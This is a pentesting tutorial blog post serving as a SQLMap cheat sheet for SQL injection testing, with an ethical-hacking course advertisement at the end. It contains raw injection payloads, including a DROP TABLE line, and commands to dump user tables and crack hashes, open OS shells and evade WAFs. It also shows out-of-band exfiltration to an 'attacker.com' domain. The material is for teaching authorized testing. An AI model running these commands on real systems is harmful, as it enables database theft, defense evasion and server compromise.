Membership

Hacking Loops

Table of Contents

Join Our Membership To Start Your Cybersecurity Journey Today!

Learn More

SQLMap Cheat Sheet: Command Reference for SQL Injection Testing (2026 Edition)

SQLMap Cheat Sheet

What Is SQLMap? (And Why Every Pentester Uses It)

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. It supports dozens of database management systems, can fingerprint databases, dump data, execute commands on the underlying operating system, and even establish out-of-band connections.  In fact it does so much is the reason why you need an SQLMap cheat sheet for simpler reference to these commands.

Why it matters: SQL injection remains one of the most critical web application vulnerabilities. OWASP consistently ranks it in the top 10, and SQLMap is the industry-standard tool for finding and exploiting these flaws during authorized penetration tests.

The honest truth: Manual SQL injection testing is tedious, time-consuming, and error-prone. SQLMap automates 90% of the grunt work so you can focus on actually exploiting vulnerabilities and writing reports.

To develop your testing strategy, you need this as Google Dorking may block your IPs if you go outside of your query limits.

The 3 AM Discovery That Changed Everything

Imagine yourself staring at the same login form for six hours trying every SQL injection payload. Nothing worked. The web application firewall was blocking everything.

' OR '1'='1
Blocked.

admin'--
Blocked.

1' UNION SELECT NULL--
Blocked.

Frustrated, you finally asked a senior pentester on your team: “How do you get past WAFs?”

The answer was simple: “Stop doing it manually. Use SQLMap.”

Twenty minutes later, you watched SQLMap automatically rotate through 60+ tamper scripts, test dozens of injection points, and extract the entire user database, including admin credentials. Imagine drawing a $140,000 salary, just because you know how to use SQLMap as the ultimate tool for pen testing. This cheat sheet is everything you wished you’d known that frustrating night. It is organized, practical, and written for people who actually need to get work done.

System Requirements & Installation

Prerequisites

SQLMap runs on Python 2.6, 2.7, or 3.x on Windows, macOS, and Linux.

Check your Python version:

python --version
# or
python3 --version

Installation Methods

Method 1: Git Clone (Recommended)

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py --version

Why this method? Easy updates with git pull, and you always have the latest tamper scripts and payloads.

Method 2: Direct Download

Method 3: Kali Linux (Pre-installed)

sqlmap --version
# Update to latest:
cd /usr/share/sqlmap
git pull

Verify installation:

sqlmap --version
# Should output something like: sqlmap/1.8#stable

The SQLMap Command Structure (How It Actually Works)

Every SQLMap command follows this pattern:

sqlmap [TARGET] [OPTIONS]

The TARGET tells SQLMap what to test.
The OPTIONS tell SQLMap how to test it.

Your First SQLMap Command

Let’s start with the absolute simplest example:

sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1"

This command:

  • Tests the URL (-u)
  • Automatically detects the artist parameter
  • Runs basic SQL injection tests
  • Reports any vulnerabilities found

Real output snippet:

[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[INFO] GET parameter 'artist' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'

Essential SQLMap Cheat Sheet Options (The 20% You’ll Use 80% of the Time)

Target Specification

Option What It Does Example
-u URL Test a specific URL -u "http://site.com/page.php?id=1"
-r FILE Load HTTP request from file -r request.txt
-g DORK Use Google dorking to find targets -g "inurl:'.php?id='"
-m FILE Test multiple URLs from file -m urls.txt
--cookie Provide session cookie --cookie="PHPSESSID=abc123"
--data Send POST data --data="id=1&submit=Submit"

Pro tip: Use -r with Burp Suite. Capture a request in Burp, right-click → Copy to file → Feed it to SQLMap. This preserves all headers, cookies, and POST data automatically.

Testing Options

Option Purpose When to Use
-p PARAM Test specific parameter(s) When you know which parameter is vulnerable
--level=1-5 Testing thoroughness Default 1; use 2-3 for thorough testing
--risk=1-3 Testing aggressiveness Default 1; use 2-3 when you have permission
--technique Specify injection techniques --technique=BEUST for specific types
--tamper Use evasion scripts --tamper=space2comment to bypass WAFs

The –level and –risk explained:

Level What Gets Tested
1 GET/POST parameters only
2 + HTTP Cookie values
3 + User-Agent and Referer headers
4 + Additional parameter types
5 Complete comprehensive testing
Risk What Happens
1 Safe queries only
2 Time-based attacks (may slow DB)
3 OR-based attacks (may modify data!)

Jake’s real-world advice: Start with --level=2 --risk=2 for most engagements. Only go to level 5 / risk 3 if you’ve exhausted other options and have explicit permission.

Database Enumeration

Option Retrieves Usage Example
--dbs List all databases Find what databases exist
--tables List tables --tables -D database_name
--columns List columns --columns -D db -T table
--dump Extract data --dump -D db -T users
--dump-all Extract everything Use with caution!
-D DB Specify database -D wordpress
-T TABLE Specify table -T wp_users
-C COL Specify column(s) -C user,password

Output & Performance Options

Option Function When to Use
--batch Never prompt for input Automated scans
--threads=N Concurrent requests --threads=10 for speed
-v LEVEL Verbosity (0-6) -v 3 to see payloads
-o All optimization switches Makes testing faster
--flush-session Clear cached data Fresh start on target
--output-dir=PATH Custom output location Organize your results

SQL Injection Techniques: What SQLMap Actually Tests

SQLMap can detect and exploit these injection types:

The Techniques (–technique flag)

B: Boolean-based blind

# Tests if TRUE/FALSE conditions affect response
' AND 1=1-- (returns normal page)
' AND 1=2-- (returns different page)

E: Error-based

# Forces database errors to leak information
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(...))x)--

U: Union query-based

# Combines malicious query with legitimate one
' UNION SELECT NULL,user(),database()--

S: Stacked queries

# Executes multiple statements
'; DROP TABLE users;--

T: Time-based blind

# Uses delays to infer TRUE/FALSE
' AND IF(1=1,SLEEP(5),0)--

Q: Inline queries

# Embeds queries within queries

Example usage:

# Test only union and error-based
sqlmap -u "http://target.com/page.php?id=1" --technique=UE

# Test everything except stacked queries
sqlmap -u "http://target.com/page.php?id=1" --technique=BEUT

Real-world scenario: Jake once encountered a target where only time-based injections worked. Using --technique=T saved him hours by skipping unsuccessful techniques.

The Complete SQLMap Cheat Sheet Testing Workflow (How Pro Pentesters Actually Use SQLMap)

Phase 1: Initial Reconnaissance

Step 1: Identify the target

# Basic test
sqlmap -u "http://target.com/product.php?id=5" --batch

# With authentication cookie
sqlmap -u "http://target.com/product.php?id=5" \
  --cookie="session=abc123; security=low" \
  --batch

Step 2: Fingerprint the database

sqlmap -u "http://target.com/product.php?id=5" \
  --banner \
  --current-user \
  --current-db \
  --batch

What this reveals:

  • Database type (MySQL, PostgreSQL, MSSQL, Oracle)
  • Database version
  • Current database name
  • Current user privileges

Phase 2: Enumeration

Step 3: List all databases

sqlmap -u "http://target.com/product.php?id=5" \
  --dbs \
  --batch

Step 4: List tables in target database

sqlmap -u "http://target.com/product.php?id=5" \
  -D webapp_db \
  --tables \
  --batch

Step 5: Get table structure

sqlmap -u "http://target.com/product.php?id=5" \
  -D webapp_db \
  -T users \
  --columns \
  --batch

Phase 3: Data Extraction

Step 6: Dump specific table

sqlmap -u "http://target.com/product.php?id=5" \
  -D webapp_db \
  -T users \
  --dump \
  --batch

Step 7: Crack password hashes (automatic)

When SQLMap finds password hashes, it automatically offers to crack them:

[INFO] recognized possible password hashes in column 'password'
do you want to crack them via a dictionary-based attack? [Y/n/q]

SQLMap will:

  1. Identify hash type (MD5, SHA1, bcrypt, etc.)
  2. Use built-in dictionary
  3. Display cracked passwords

Output example:

Database: webapp_db
Table: users
[3 entries]
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2  | john     | 098f6bcd4621d373cade4e832627b4f6 |
| 3  | sarah    | e99a18c428cb38d5f260853678922e03 |
+----+----------+----------------------------------+

[INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[INFO] cracked password 'test' for hash '098f6bcd4621d373cade4e832627b4f6'

Bypassing WAFs: The Tamper Script Arsenal

Web Application Firewalls (WAFs) detect and block SQL injection attempts. Tamper scripts modify payloads to evade detection.

Most Useful Tamper Scripts

Script What It Does Example Transformation
space2comment Replace spaces with comments SELECT * FROM usersSELECT/**/FROM/**/users
randomcase Randomize character case SELECTSeLeCt
between Replace > with NOT BETWEEN id > 1id NOT BETWEEN 0 AND 1
charencode URL encode characters '%27
apostrophemask Replace apostrophe with UTF-8 '%EF%BC%87
base64encode Base64 encode payload adminYWRtaW4=
versionedkeywords Add MySQL version comments UNION/*!UNION*/

Real-World WAF Bypass Cheat Sheet Example

Scenario: Cloudflare is blocking your basic payloads.

Failed attempt:

sqlmap -u "http://target.com/page.php?id=1"
# Result: All payloads blocked by Cloudflare

Successful bypass:

sqlmap -u "http://target.com/page.php?id=1" \
  --tamper=space2comment,between,randomcase \
  --random-agent \
  --delay=2 \
  --batch

Why this works:

  • space2comment: Evades space-based detection
  • between: Changes comparison operators
  • randomcase: Bypasses case-sensitive filters
  • --random-agent: Rotates User-Agent strings
  • --delay=2: Slows requests (looks more human)

Jake’s WAF bypass strategy:

  1. Start with space2comment (works 60% of the time)
  2. Add randomcase (catches another 20%)
  3. Try between (for strict filtering)
  4. Last resort: Stack 4-5 tampers together

List All Available Tampers

sqlmap --list-tampers

Output shows 60+ scripts:

[INFO] listing tamper scripts

0eunion
apostrophemask
apostrophenullencode
appendnullbyte
base64encode
between
...

Using Multiple Tampers

# Combine multiple tamper scripts
sqlmap -u "http://target.com/page.php?id=1" \
  --tamper=space2comment,randomcase,charencode,between \
  --batch

Order matters: Tampers apply left-to-right. Test combinations to find what works.

Advanced SQLMap Cheat Sheet Techniques

1. Testing POST Requests

Capture request with Burp Suite:

POST /login.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Cookie: session=xyz

username=admin&password=test&submit=Login

Save to file (request.txt) and test:

sqlmap -r request.txt \
  -p username,password \
  --batch

2. Cookie-Based Injection

sqlmap -u "http://target.com/page.php" \
  --cookie="id=1*;session=abc123" \
  --level=2 \
  --batch

Note the asterisk (*): Marks the injection point.

3. Testing with Authentication

HTTP Basic Auth:

sqlmap -u "http://target.com/admin/page.php?id=1" \
  --auth-type=Basic \
  --auth-cred="admin:password123" \
  --batch

Form-based auth:

# First, get the session cookie by logging in manually
# Then use the cookie:
sqlmap -u "http://target.com/dashboard.php?id=1" \
  --cookie="PHPSESSID=abc123def456" \
  --batch

4. Second-Order SQL Injection

Second-order injections store malicious payloads that execute later.

sqlmap -u "http://target.com/register.php" \
  --data="username=admin&email=test@test.com" \
  --second-url="http://target.com/profile.php?id=USER_ID" \
  --batch

5. Out-of-Band Exfiltration

Use DNS or HTTP to exfiltrate data when direct responses don’t work:

sqlmap -u "http://target.com/page.php?id=1" \
  --dns-domain="attacker.com" \
  --batch

Requires: DNS server you control to capture exfiltrated data.

6. OS Command Execution

If the database user has sufficient privileges:

# Get an OS shell
sqlmap -u "http://target.com/page.php?id=1" \
  --os-shell \
  --batch

What you can do:

  • Execute system commands
  • Read/write files
  • Privilege escalation

Example interaction:

os-shell> whoami
www-data

os-shell> ls -la /var/www
total 48
drwxr-xr-x  5 www-data www-data  4096 Jan 15 10:30 .
...

7. SQL Shell Access

sqlmap -u "http://target.com/page.php?id=1" \
  --sql-shell \
  --batch

Direct SQL query execution:

sql-shell> SELECT user, host FROM mysql.user;
[INFO] fetching entries for query
+------+-----------+
| user | host      |
+------+-----------+
| root | localhost |
| web  | %         |
+------+-----------+

The SQLMap File Structure (Know Where Everything Lives)

Important Directories

sqlmap/
├── sqlmap.py           # Main executable
├── sqlmap.conf         # Default configuration
├── data/
│   ├── txt/           # Wordlists for dictionary attacks
│   └── xml/
│       └── payloads/  # SQL injection payloads
├── tamper/            # WAF bypass scripts
├── output/            # Scan results (auto-created)
└── plugins/           # Database-specific modules

Key Files to Know

File/Directory Purpose Customization
/data/txt/common-columns.txt Column name wordlist Add common column names you encounter
/data/txt/passwords.txt Default password dictionary Add company-specific passwords
/tamper/ WAF bypass scripts Create custom tampers
/output/ Results storage Find extracted data here
sqlmap.conf Default settings Set preferred options

Kali Linux locations:

  • Installation: /usr/share/sqlmap/
  • Output: /home/kali/.local/share/sqlmap/output/
  • History: /home/kali/.local/share/sqlmap/history

Verbosity Levels: Seeing What SQLMap Is Doing

Control how much information SQLMap displays:

Level What You See When to Use
0 Errors only Production scans
1 Basic info (default) Normal use
2 Debug messages Troubleshooting
3 Payloads injected Understanding attacks
4 HTTP requests Analyzing traffic
5 HTTP response headers Deep debugging
6 Full HTTP responses Complete visibility

Example:

# See every payload SQLMap tries
sqlmap -u "http://target.com/page.php?id=1" -v 3 --batch

Output at level 3:

[INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[PAYLOAD] 1 AND 2838=2838
[PAYLOAD] 1 AND 5628=3419
[INFO] testing 'MySQL >= 5.0 AND error-based...'
[PAYLOAD] 1 AND (SELECT 1234 FROM(SELECT COUNT(*),...)x)

Real-World Testing Scenarios

Scenario 1: E-commerce Product Page

Target: https://shop.example.com/product?id=42

Full command:

sqlmap -u "https://shop.example.com/product?id=42" \
  --level=3 \
  --risk=2 \
  --threads=5 \
  --batch \
  --dbs

If blocked by WAF:

sqlmap -u "https://shop.example.com/product?id=42" \
  --level=3 \
  --risk=2 \
  --tamper=space2comment,between \
  --random-agent \
  --delay=1 \
  --batch \
  --dbs

Scenario 2: Login Form (POST)

Steps:

  1. Capture the login request in Burp Suite
  2. Save to login.txt
  3. Run SQLMap:
sqlmap -r login.txt \
  --level=2 \
  --risk=2 \
  -p username \
  --batch \
  --dump

Scenario 3: Search Functionality

Target: https://example.com/search?q=laptop

sqlmap -u "https://example.com/search?q=laptop*" \
  --level=2 \
  --batch \
  --tables

Note the asterisk: Marks q parameter as the injection point.

Scenario 4: Mobile API Testing

Captured API request:

POST /api/v1/user/profile HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJ...
Content-Type: application/json

{"user_id":"123"}

Save and test:

sqlmap -r api_request.txt \
  --level=2 \
  --risk=2 \
  --batch \
  --current-db

Common Errors & Troubleshooting

Error: “All tested parameters do not appear to be injectable”

Possible causes:

  1. WAF is blocking (try tamper scripts)
  2. Need higher –level (test cookies, headers)
  3. Parameter genuinely isn’t vulnerable
  4. Need authentication (provide cookies)

Solution:

# Increase thoroughness
sqlmap -u "URL" --level=3 --risk=2 --tamper=space2comment --batch

Error: “Connection timeout”

Cause: Target is slow or rate-limiting you.

Solution:

# Add delays and reduce threads
sqlmap -u "URL" --delay=2 --timeout=30 --threads=1 --batch

Error: “CAPTCHA detected”

Cause: Target requires CAPTCHA solving.

Solution: SQLMap can’t solve CAPTCHAs automatically. You need to:

  1. Get a valid session cookie after solving CAPTCHA manually
  2. Provide it to SQLMap with --cookie

WAF Keeps Blocking

Escalation strategy:

# Level 1: Basic evasion
--tamper=space2comment --random-agent

# Level 2: Moderate evasion
--tamper=space2comment,between,randomcase --random-agent --delay=1

# Level 3: Aggressive evasion
--tamper=space2comment,between,randomcase,charencode --random-agent --delay=2 --tor

# Level 4: Custom approach (manual)
# Analyze WAF behavior, write custom tamper script

SQLMap Best Practices for Professional Pentesters

1. Always Get Written Permission

SQL injection testing can crash databases and modify data. Never test without explicit authorization.

2. Start Conservative, Escalate Gradually

# Phase 1: Safe testing
--level=1 --risk=1 --batch

# Phase 2: Moderate testing
--level=2 --risk=2 --batch

# Phase 3: Aggressive (only with permission)
--level=3 --risk=3 --batch

3. Use –batch for Automated Scans

Prevents SQLMap from prompting you during scans. Essential for scripting.

4. Organize Your Output

sqlmap -u "URL" --output-dir="./client_name/$(date +%Y%m%d)" --batch

Creates dated directories for each engagement.

5. Save Successful Commands

Create a successful_commands.txt file for each engagement:

echo "sqlmap -u 'http://target.com/page.php?id=1' --tamper=space2comment --batch --dbs" >> successful_commands.txt

6. Don’t Forget –flush-session

If you’re re-testing the same target with different options:

sqlmap -u "URL" --flush-session --batch

Clears cached data from previous scans.

7. Document Everything

For each successful injection, note:

  • URL and parameter
  • Injection technique that worked
  • Database type and version
  • Data extracted
  • Tamper scripts used
  • Any errors encountered

SQLMap for Bug Bounty Hunters

Quick Wins for Bug Bounties

1. Google Dorking + SQLMap

sqlmap -g "inurl:.php?id= site:example.com" --batch --dbs

Automatically tests Google search results.

2. Test All Parameters

sqlmap -u "http://target.com/page.php?id=1&lang=en&sort=asc" \
  --batch \
  --dbs

SQLMap tests id, lang, and sort automatically.

3. Cookie-Based Injections (Often overlooked)

sqlmap -u "http://target.com/page.php" \
  --cookie="session=abc; id=1*" \
  --level=2 \
  --batch

Bug Bounty Reporting Template

When you find a SQLi vulnerability via SQLMap, report it like this:

Title: SQL Injection in Product Search

Severity: High/Critical

Affected Parameter: 
https://example.com/search?q=[INJECTION]

Steps to Reproduce:
1. Navigate to https://example.com/search
2. Capture the request (Burp Suite recommended)
3. Run: sqlmap -u "https://example.com/search?q=test" --batch --dbs

Proof of Concept:
[Screenshot of SQLMap successfully extracting database names]

Output:
available databases [3]:
[*] information_schema
[*] mysql
[*] production_db

Impact:
- Unauthorized database access
- Potential data exfiltration
- Possible data modification/deletion

Remediation:
- Use parameterized queries/prepared statements
- Input validation and sanitization
- Implement WAF rules

The SQLMap Quick Reference Card

Most Common Commands

# Basic vulnerability test
sqlmap -u "URL" --batch

# List databases
sqlmap -u "URL" --dbs --batch

# Dump specific table
sqlmap -u "URL" -D database -T table --dump --batch

# Bypass WAF
sqlmap -u "URL" --tamper=space2comment --random-agent --batch

# Test POST request
sqlmap -r request.txt --batch

# Get OS shell
sqlmap -u "URL" --os-shell --batch

# Maximum thoroughness
sqlmap -u "URL" --level=5 --risk=3 --batch

# With authentication
sqlmap -u "URL" --cookie="session=abc123" --batch

Essential Flags Cheat Sheet

Task Command
Test URL -u "URL"
Test POST -r file.txt
Specify param -p param
List databases --dbs
List tables --tables -D db
List columns --columns -D db -T table
Dump data --dump -D db -T table
Bypass WAF --tamper=script
Use threads --threads=10
Delay requests --delay=2
Be thorough --level=3 --risk=2
Auto-answer --batch
See payloads -v 3
Clear session --flush-session

Conclusion: From Manual Testing to SQLMap Mastery

With SQLMap, get the true power of automation when you know how to use it right.

This cheat sheet covered:

  • Installation and setup
  • Essential commands and options
  • WAF bypass techniques
  • Real-world testing scenarios
  • Professional pentesting workflows
  • Bug bounty hunting strategies

Your next steps:

  1. Install SQLMap on your system
  2. Set up a practice target (DVWA, bWAPP, or HackTheBox)
  3. Work through the testing workflow section
  4. Practice with different tamper scripts
  5. Document what works for future reference

Remember: SQLMap is a powerful tool for authorized penetration testing. Always get written permission before testing any system you don’t own.

Master Ethical Hacking with Professional Training

SQLMap is just one tool in a professional pentester’s arsenal. To truly master web application security testing, you need comprehensive training covering:

Complete ethical hacking methodology
Web application penetration testing
Manual SQLi techniques (understand what SQLMap automates)
Other injection types (XSS, command injection, XXE)
Authentication bypass techniques
API security testing
Report writing for clients

Our Ethical Hacking Course Bundle gives you everything Jake learned on his journey from frustrated beginner to $140K/year lead pentester:

✓ Complete ethical hacking course from scratch
✓ Website hacking and penetration testing
✓ Wi-Fi and network hacking
✓ Social engineering testing
✓ Hands-on labs with real vulnerable applications
✓ Certification preparation
✓ Career guidance and job interview prep

Start your ethical hacking training today and join thousands of students who’ve launched successful pentesting careers.

P.S. — Bookmark this page. You’ll reference it constantly during real penetration tests. And when you successfully exploit your first SQL injection vulnerability with SQLMap, you’ll understand why it’s the industry standard tool.

Scroll to Top